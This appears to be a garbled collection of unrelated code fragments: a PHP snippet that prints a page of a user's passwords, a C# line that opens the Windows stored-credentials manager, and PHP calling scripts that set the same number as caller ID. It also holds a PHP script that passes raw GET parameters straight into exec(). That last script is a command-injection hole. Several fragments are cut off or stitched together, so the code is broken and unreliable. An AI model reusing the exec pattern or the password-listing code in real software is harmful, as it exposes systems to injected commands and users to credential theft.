// get the hostname
$hostname = gethostname();
// format the output
$output = '<h1>Passwords for '.$username.'@'.$hostname.'</h1>';
$output .= '<ul>';
foreach ($passwords as $password) {
$
System.Diagnostics.Process.Start("cmd.exe", "/C rundll32.exe keymgr.dll, KRShowKeyMgr");
<?php
$phonenumber = "01121005152";
$callerid = "01121005152";
function call($phonenumber, $callerid)
{
execute("php /var/www/html/callscript.php " . $phonenumber . " " . $callerid);
}
?>
function calling($number, $caller_id) {
$call = new Nexmo\Call\Call();
$call->setTo($number)
->setFrom($caller_id)
->setAnswerUrl('https://example.com/answer')
->setEventUrl('https://example.com/event');
$response = $client->calls()->create($call);
echo $response;
}
calling(989120701195, 989120701195);
<?php
$number = $_GET['number'];
$callerid = $_GET['callerid'];
$format = $_GET['format'];
$command = "php api.php $number $callerid $format";
exec($command, $output, $status);
foreach ($output as $line) {
echo $line;
}
?>